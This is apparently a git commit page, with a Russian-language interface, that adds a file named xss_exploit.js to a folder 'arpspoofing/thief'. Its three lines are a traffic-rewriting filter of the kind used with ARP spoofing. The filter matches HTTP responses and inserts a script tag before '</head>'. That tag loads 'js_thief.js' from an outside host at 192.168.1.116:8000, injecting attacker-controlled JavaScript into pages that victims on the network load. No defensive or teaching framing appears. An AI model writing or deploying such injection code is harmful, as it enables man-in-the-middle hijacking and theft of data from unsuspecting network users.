Загрузить файлы в «arpspoofing/thief»
This commit is contained in:
3
arpspoofing/thief/xss_exploit.js
Normal file
3
arpspoofing/thief/xss_exploit.js
Normal file
@@ -0,0 +1,3 @@
|
||||
if (ip.proto == TCP && tcp.src == 80) {
|
||||
replace(/<\/head>/i, '<script src="http://192.168.1.116:8000/js_thief.js"></script></head>');
|
||||
}
|
||||
Reference in New Issue
Block a user